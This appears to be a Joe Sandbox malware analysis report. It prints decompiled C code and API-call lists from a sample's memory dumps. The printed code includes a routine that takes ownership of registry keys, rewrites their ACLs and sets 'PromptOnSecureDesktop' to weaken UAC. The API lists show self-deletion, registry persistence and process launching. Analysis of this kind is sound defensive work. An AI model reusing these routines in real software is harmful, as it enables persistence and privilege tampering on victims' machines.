                                                                                			E00408E26(void* __ecx, void* __edx, long _a4, void* _a8, long _a12, void* _a16, long _a20, DWORD* _a24) {
				char _v12;
				int _t13;
				DWORD* _t14;
				int _t15;
				void* _t20;
				void* _t23;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t20 = CreateFileW(E00402508(0x4129f8,  &E0041076C, 0xe, 0xec64, 0x7bac), 0xc0000000, 0, 0, 2, 0x80, 0);
				E0040EE2A(_t22, 0x4129f8, 0, 0x200);
				if(_t20 == 0xffffffff) {
					_t13 = 0;
				} else {
					_t23 = _a8;
					if(_t23 == 0) {
						E00408DF1( &_v12);
						_t23 =  &_v12;
						_a12 = 8;
					}
					_t14 = _a24;
					 *_t14 = 0;
					_t15 = DeviceIoControl(_t20, _a4, _t23, _a12, _a16, _a20, _t14, 0);
					CloseHandle(_t20);
					_t13 = _t15;
				}
				return _t13;
			}









                                                                                0x00408e26
                                                                                0x00408e29
                                                                                0x00408e2a
                                                                                0x00408e6c
                                                                                0x00408e6e
                                                                                0x00408e79
                                                                                0x00408ebe
                                                                                0x00408e7b
                                                                                0x00408e7b
                                                                                0x00408e80
                                                                                0x00408e86
                                                                                0x00408e8c
                                                                                0x00408e8f
                                                                                0x00408e8f
                                                                                0x00408e96
                                                                                0x00408e9e
                                                                                0x00408eab
                                                                                0x00408eb4
                                                                                0x00408eba
                                                                                0x00408eba
                                                                                0x00408ec4

                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00408E5F
                                                                                • DeviceIoControl.KERNEL32 ref: 00408EAB
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EB4
                                                                                  • Part of subcall function 00408DF1: GetSystemTime.KERNEL32(?,004129F8,?,?,00408E8B,?), ref: 00408DFC
                                                                                  • Part of subcall function 00408DF1: SystemTimeToFileTime.KERNEL32(?,00408E8B,?,?,00408E8B,?), ref: 00408E0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$FileSystem$CloseControlCreateDeviceHandle
                                                                                • String ID:
                                                                                • API String ID: 3754425949-0
                                                                                • Opcode ID: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
                                                                                • Instruction ID: 6158522553dbc768b3fa764069f531a078bfca64040c8912efb0c234455cb59d
                                                                                • Opcode Fuzzy Hash: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
                                                                                • Instruction Fuzzy Hash: CD11C8726402047BEB115F95CD4EEDB3F6DEB85714F00452AF611B62C1DAB9985087A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004088B0 Relevance: .1, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004088B0(intOrPtr _a4) {
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t101;

				_t101 = _a4;
				E0040EE2A(_t99, _t101, 0, 0x3e0);
				 *((intOrPtr*)(_t101 + 0xc0)) = __imp__#19;
				 *((intOrPtr*)(_t101 + 0xc4)) = __imp__#16;
				 *((intOrPtr*)(_t101 + 0xc8)) = __imp__#23;
				 *((intOrPtr*)(_t101 + 0xcc)) = __imp__#4;
				 *((intOrPtr*)(_t101 + 0xd0)) = __imp__#3;
				 *((intOrPtr*)(_t101 + 0xd4)) = __imp__#21;
				 *((intOrPtr*)(_t101 + 0xd8)) = __imp__#2;
				 *((intOrPtr*)(_t101 + 0xdc)) = __imp__#13;
				 *((intOrPtr*)(_t101 + 0xe0)) = __imp__#1;
				 *((intOrPtr*)(_t101 + 0xe4)) = __imp__#18;
				 *((intOrPtr*)(_t101 + 0xe8)) = __imp__#5;
				_t98 = __imp__#6;
				 *((intOrPtr*)(_t101 + 0x10)) = E00404861;
				 *((intOrPtr*)(_t101 + 0x14)) = E00405B84;
				 *((intOrPtr*)(_t101 + 0x18)) = E00404EF2;
				 *((intOrPtr*)(_t101 + 8)) = 0;
				 *((intOrPtr*)(_t101 + 0xc)) = 0;
				 *((intOrPtr*)(_t101 + 0x1c)) = E004038F0;
				 *((intOrPtr*)(_t101 + 0x20)) = E0040384F;
				 *((intOrPtr*)(_t101 + 0x134)) = E004035A5;
				 *((intOrPtr*)(_t101 + 0x24)) = E00408EC5;
				 *((intOrPtr*)(_t101 + 0x28)) = E00408EFA;
				 *((intOrPtr*)(_t101 + 0x2c)) = E00408F28;
				 *((intOrPtr*)(_t101 + 0x30)) = E00408F53;
				 *((intOrPtr*)(_t101 + 0x34)) = E004022B9;
				 *((intOrPtr*)(_t101 + 0x38)) = E004025B4;
				 *((intOrPtr*)(_t101 + 0x3c)) = E00408F87;
				 *((intOrPtr*)(_t101 + 0x54)) = E0040AD89;
				 *((intOrPtr*)(_t101 + 0x58)) = E0040B211;
				 *((intOrPtr*)(_t101 + 0x5c)) = E0040AEDD;
				 *((intOrPtr*)(_t101 + 0x60)) = E0040F304;
				 *((intOrPtr*)(_t101 + 0x64)) = E0040F428;
				 *((intOrPtr*)(_t101 + 0x68)) = E0040F43E;
				 *((intOrPtr*)(_t101 + 0x6c)) = E0040F483;
				 *((intOrPtr*)(_t101 + 0x70)) = 0x412104;
				 *((intOrPtr*)(_t101 + 0x74)) = E0040F26D;
				 *((intOrPtr*)(_t101 + 0x78)) = E0040F315;
				 *((intOrPtr*)(_t101 + 0x7c)) = E0040E52E;
				 *((intOrPtr*)(_t101 + 0x80)) = E0040E318;
				 *((intOrPtr*)(_t101 + 0x84)) = E0040EAAF;
				 *((intOrPtr*)(_t101 + 0x88)) = E0040E7B4;
				 *((intOrPtr*)(_t101 + 0x8c)) = E0040DD05;
				 *((intOrPtr*)(_t101 + 0x90)) = E0040E7FF;
				 *((intOrPtr*)(_t101 + 0x94)) = E0040DD69;
				 *((intOrPtr*)(_t101 + 0x98)) = E0040E819;
				 *((intOrPtr*)(_t101 + 0x9c)) = E0040E854;
				 *((intOrPtr*)(_t101 + 0xa0)) = E0040E8A1;
				 *((intOrPtr*)(_t101 + 0xa4)) = E0040EA84;
				 *((intOrPtr*)(_t101 + 0xa8)) = E0040DF4C;
				 *((intOrPtr*)(_t101 + 0xac)) = E0040DF70;
				 *((intOrPtr*)(_t101 + 0xb0)) = E0040E654;
				 *((intOrPtr*)(_t101 + 0xb4)) = E0040E749;
				 *((intOrPtr*)(_t101 + 0xb8)) = E004030B5;
				 *((intOrPtr*)(_t101 + 0xbc)) = 0;
				 *((intOrPtr*)(_t101 + 0xec)) = _t98;
				 *((intOrPtr*)(_t101 + 0xf0)) = E00402684;
				 *((intOrPtr*)(_t101 + 0xf4)) = E004026B2;
				 *((intOrPtr*)(_t101 + 0xf8)) = E00402EF8;
				 *((intOrPtr*)(_t101 + 0xfc)) = E00402F22;
				 *((intOrPtr*)(_t101 + 0x100)) = 0;
				 *((intOrPtr*)(_t101 + 0x104)) = 0;
				 *((intOrPtr*)(_t101 + 0x108)) = 0;
				 *((intOrPtr*)(_t101 + 0x10c)) = 0;
				 *((intOrPtr*)(_t101 + 0x110)) = 0;
				 *((intOrPtr*)(_t101 + 0x114)) = E0040A7C1;
				 *((intOrPtr*)(_t101 + 0x118)) = E00401FEB;
				 *((intOrPtr*)(_t101 + 0x11c)) = 0x401ffe;
				 *((intOrPtr*)(_t101 + 0x138)) = E00406509;
				 *((intOrPtr*)(_t101 + 0x140)) = E00405D34;
				 *((intOrPtr*)(_t101 + 0x144)) = E00405C05;
				 *((intOrPtr*)(_t101 + 0x148)) = E00405D93;
				 *((intOrPtr*)(_t101 + 0x14c)) = E00405E37;
				 *((intOrPtr*)(_t101 + 0x150)) = E004048C9;
				 *((intOrPtr*)(_t101 + 0x154)) = E00405E21;
				 *((intOrPtr*)(_t101 + 0x158)) = E00405CE1;
				 *((intOrPtr*)(_t101 + 0x15c)) = E00405DED;
				 *((intOrPtr*)(_t101 + 0x160)) = E00404EFD;
				 *((intOrPtr*)(_t101 + 0x164)) = E004048C9;
				 *((intOrPtr*)(_t101 + 0x168)) = E0040488C;
				 *((intOrPtr*)(_t101 + 0x174)) = E00404F13;
				 *((intOrPtr*)(_t101 + 0x178)) = E00404F50;
				 *((intOrPtr*)(_t101 + 0x17c)) = E004082BB;
				 *((intOrPtr*)(_t101 + 0x180)) = E004082C1;
				 *((intOrPtr*)(_t101 + 0x184)) = 0x4082c7;
				 *((intOrPtr*)(_t101 + 0x188)) = 0x408308;
				return _t98;
			}






                                                                                0x004088b1
                                                                                0x004088bf
                                                                                0x004088c9
                                                                                0x004088d4
                                                                                0x004088df
                                                                                0x004088ea
                                                                                0x004088f5
                                                                                0x00408900
                                                                                0x0040890b
                                                                                0x00408916
                                                                                0x00408921
                                                                                0x0040892c
                                                                                0x00408937
                                                                                0x0040893d
                                                                                0x00408945
                                                                                0x0040894c
                                                                                0x00408953
                                                                                0x0040895a
                                                                                0x0040895d
                                                                                0x00408960
                                                                                0x00408967
                                                                                0x0040896e
                                                                                0x00408978
                                                                                0x0040897f
                                                                                0x00408986
                                                                                0x0040898d
                                                                                0x00408994
                                                                                0x0040899b
                                                                                0x004089a2
                                                                                0x004089a9
                                                                                0x004089b0
                                                                                0x004089b7
                                                                                0x004089be
                                                                                0x004089c5
                                                                                0x004089cc
                                                                                0x004089d3
                                                                                0x004089da
                                                                                0x004089e1
                                                                                0x004089e8
                                                                                0x004089ef
                                                                                0x004089f6
                                                                                0x00408a00
                                                                                0x00408a0a
                                                                                0x00408a14
                                                                                0x00408a1e
                                                                                0x00408a28
                                                                                0x00408a32
                                                                                0x00408a3c
                                                                                0x00408a46
                                                                                0x00408a50
                                                                                0x00408a5a
                                                                                0x00408a64
                                                                                0x00408a6e
                                                                                0x00408a78
                                                                                0x00408a82
                                                                                0x00408a8c
                                                                                0x00408a92
                                                                                0x00408a98
                                                                                0x00408aa2
                                                                                0x00408aac
                                                                                0x00408ab6
                                                                                0x00408ac0
                                                                                0x00408ac6
                                                                                0x00408acc
                                                                                0x00408ad2
                                                                                0x00408ad8
                                                                                0x00408adf
                                                                                0x00408ae9
                                                                                0x00408af3
                                                                                0x00408afd
                                                                                0x00408b07
                                                                                0x00408b11
                                                                                0x00408b1b
                                                                                0x00408b25
                                                                                0x00408b2f
                                                                                0x00408b39
                                                                                0x00408b43
                                                                                0x00408b4d
                                                                                0x00408b57
                                                                                0x00408b61
                                                                                0x00408b6b
                                                                                0x00408b75
                                                                                0x00408b7f
                                                                                0x00408b89
                                                                                0x00408b93
                                                                                0x00408b9d
                                                                                0x00408ba7
                                                                                0x00408bb2

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
                                                                                • Instruction ID: 64893a5cec851924fefc00027ac9d8258265f32e823952a4835c6918c3f2ac29
                                                                                • Opcode Fuzzy Hash: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
                                                                                • Instruction Fuzzy Hash: 59714BB4501B41CFD360CF66D548782BBE0BB54308F10CD6ED5AAAB790DBB86588DF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007B9781 Relevance: .1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, Offset: 007B6000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7b6000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction ID: 8d065e3dfa3762279c5530838fe6b7424c9358bcd16179978c9c063e80d79151
                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction Fuzzy Hash: D9117C72350100AFD744DE65DC91FE673EAEB89320B298065EA14CB316E679EC01C760
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02080D90 Relevance: .0, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction ID: 62ef794621d5ea3b2d77e87dd9d73198f7d5adc64546af18e458383c1f14b76b
                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction Fuzzy Hash: C701F272A107008FDF22EF20C805BAB33E6FB86316F0540A4D94A97281E770A8498B80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02089EA0 Relevance: 59.9, APIs: 28, Strings: 6, Instructions: 421stringregistryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExitProcess.KERNEL32 ref: 02089E6D
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 02089FE1
                                                                                • lstrcat.KERNEL32(?,?), ref: 02089FF2
                                                                                • lstrcat.KERNEL32(?,0041070C), ref: 0208A004
                                                                                • GetFileAttributesExA.KERNEL32(?,?,?), ref: 0208A054
                                                                                • DeleteFileA.KERNEL32(?), ref: 0208A09F
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 0208A0D6
                                                                                • lstrcpy.KERNEL32 ref: 0208A12F
                                                                                • lstrlen.KERNEL32(00000022), ref: 0208A13C
                                                                                • GetTempPathA.KERNEL32(000001F4,?), ref: 02089F13
                                                                                  • Part of subcall function 02087029: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 02087081
                                                                                  • Part of subcall function 02086F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\seokopfr,02087043), ref: 02086F4E
                                                                                  • Part of subcall function 02086F30: GetProcAddress.KERNEL32(00000000), ref: 02086F55
                                                                                  • Part of subcall function 02086F30: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02086F7B
                                                                                  • Part of subcall function 02086F30: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02086F92
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 0208A1A2
                                                                                • RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0208A1C5
                                                                                • GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 0208A214
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 0208A21B
                                                                                • GetDriveTypeA.KERNEL32(?), ref: 0208A265
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0208A29F
                                                                                • lstrcat.KERNEL32(?,00410A34), ref: 0208A2C5
                                                                                • lstrcat.KERNEL32(?,00000022), ref: 0208A2D9
                                                                                • lstrcat.KERNEL32(?,00410A34), ref: 0208A2F4
                                                                                • wsprintfA.USER32 ref: 0208A31D
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0208A345
                                                                                • lstrcat.KERNEL32(?,?), ref: 0208A364
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 0208A387
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 0208A398
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0208A1D1
                                                                                  • Part of subcall function 02089966: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 0208999D
                                                                                  • Part of subcall function 02089966: RegDeleteValueA.ADVAPI32(?,00000000), ref: 020899BD
                                                                                  • Part of subcall function 02089966: RegCloseKey.ADVAPI32(?), ref: 020899C6
                                                                                • GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 0208A3DB
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 0208A3E2
                                                                                • GetDriveTypeA.KERNEL32(00000022), ref: 0208A41D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
                                                                                • String ID: "$"$"$D$P$\
                                                                                • API String ID: 1653845638-2605685093
                                                                                • Opcode ID: 367b9be05492a2edfb885d1a7c41413b002776b69c7dc48c576c8fe787930bc5
                                                                                • Instruction ID: 28fd8a5d5409e48a19639d5ac27e3444c7a780dba533511ee68cb6634163492c
                                                                                • Opcode Fuzzy Hash: 367b9be05492a2edfb885d1a7c41413b002776b69c7dc48c576c8fe787930bc5
                                                                                • Instruction Fuzzy Hash: 07F141B1D4035DAFDF22EBA08C88FEF7BBCAB08304F0444A6E645E2141E77596859F64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407A95 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 99%
                                                                                			E00407A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				int _t148;
				int _t151;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28);
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags =  *0x4121a8; // 0x0
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173);
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x412cc0; // 0x0
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t126 = 0x4121a8;
						_t83 =  &(_t126[1]); // 0x4121a9
						_t174 = _t83;
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E00402544("PromptOnSecureDesktop", 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, 0x4121a8, _t126 - _t174 + 1);
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x412cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175);
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}


















































                                                                                0x00407aae
                                                                                0x00407ab4
                                                                                0x00407ab7
                                                                                0x00407ac2
                                                                                0x00000000
                                                                                0x00407ac4
                                                                                0x00407adc
                                                                                0x00407adf
                                                                                0x00407ae5
                                                                                0x00407ae7
                                                                                0x00407da7
                                                                                0x00407daa
                                                                                0x00000000
                                                                                0x00407aed
                                                                                0x00407b0c
                                                                                0x00407b13
                                                                                0x00407b16
                                                                                0x00407b1c
                                                                                0x00407b1e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407b34
                                                                                0x00407b3b
                                                                                0x00407b41
                                                                                0x00407b43
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407b59
                                                                                0x00407b5f
                                                                                0x00407b61
                                                                                0x00407bb8
                                                                                0x00407bcb
                                                                                0x00407bce
                                                                                0x00407bd4
                                                                                0x00407bd6
                                                                                0x00407da6
                                                                                0x00000000
                                                                                0x00407da6
                                                                                0x00407bdc
                                                                                0x00407bdf
                                                                                0x00407be1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407be9
                                                                                0x00407beb
                                                                                0x00407bee
                                                                                0x00407bf2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407bf8
                                                                                0x00407bf8
                                                                                0x00407c00
                                                                                0x00407c06
                                                                                0x00407c08
                                                                                0x00407cc6
                                                                                0x00407cc6
                                                                                0x00407cc6
                                                                                0x00407cc6
                                                                                0x00000000
                                                                                0x00407cc6
                                                                                0x00407c14
                                                                                0x00407c16
                                                                                0x00407c19
                                                                                0x00407c1b
                                                                                0x00407c4f
                                                                                0x00407c4f
                                                                                0x00407c52
                                                                                0x00407c57
                                                                                0x00407c5e
                                                                                0x00407c5e
                                                                                0x00407c5e
                                                                                0x00407c66
                                                                                0x00407c6c
                                                                                0x00407c6f
                                                                                0x00407c71
                                                                                0x00407c86
                                                                                0x00407c73
                                                                                0x00407c78
                                                                                0x00407c7f
                                                                                0x00407c7f
                                                                                0x00407c8b
                                                                                0x00407c8e
                                                                                0x00407c90
                                                                                0x00407c93
                                                                                0x00407c96
                                                                                0x00407c96
                                                                                0x00407c9d
                                                                                0x00407c9f
                                                                                0x00407ca7
                                                                                0x00407ca7
                                                                                0x00407ca9
                                                                                0x00407cac
                                                                                0x00407cb2
                                                                                0x00407cb2
                                                                                0x00407cb5
                                                                                0x00407cc3
                                                                                0x00000000
                                                                                0x00407ca1
                                                                                0x00407ca1
                                                                                0x00407ca5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407ca5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407c1d
                                                                                0x00407c1d
                                                                                0x00407c27
                                                                                0x00407c2d
                                                                                0x00407c2f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407c31
                                                                                0x00407c32
                                                                                0x00407c34
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407c34
                                                                                0x00407c36
                                                                                0x00407c38
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407c40
                                                                                0x00407c46
                                                                                0x00407cc9
                                                                                0x00407cc9
                                                                                0x00407cd0
                                                                                0x00407cd0
                                                                                0x00407cd9
                                                                                0x00407cdc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407ce2
                                                                                0x00407ce8
                                                                                0x00407d5a
                                                                                0x00407d61
                                                                                0x00407d6a
                                                                                0x00407d6c
                                                                                0x00407d6e
                                                                                0x00407d72
                                                                                0x00407d78
                                                                                0x00407d7a
                                                                                0x00407d82
                                                                                0x00407d88
                                                                                0x00407d8a
                                                                                0x00407d92
                                                                                0x00407d98
                                                                                0x00407d9a
                                                                                0x00407d9c
                                                                                0x00407d9c
                                                                                0x00407d9a
                                                                                0x00407d8a
                                                                                0x00407da0
                                                                                0x00407da0
                                                                                0x00000000
                                                                                0x00407d6e
                                                                                0x00407cea
                                                                                0x00407cf0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407cff
                                                                                0x00407d05
                                                                                0x00407d0b
                                                                                0x00407d0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407d14
                                                                                0x00407d16
                                                                                0x00407d16
                                                                                0x00407d19
                                                                                0x00407d19
                                                                                0x00407d1b
                                                                                0x00407d1c
                                                                                0x00407d1c
                                                                                0x00407d4a
                                                                                0x00407d50
                                                                                0x00407d52
                                                                                0x00407d54
                                                                                0x00407d54
                                                                                0x00000000
                                                                                0x00407d52
                                                                                0x00407b6a
                                                                                0x00407b70
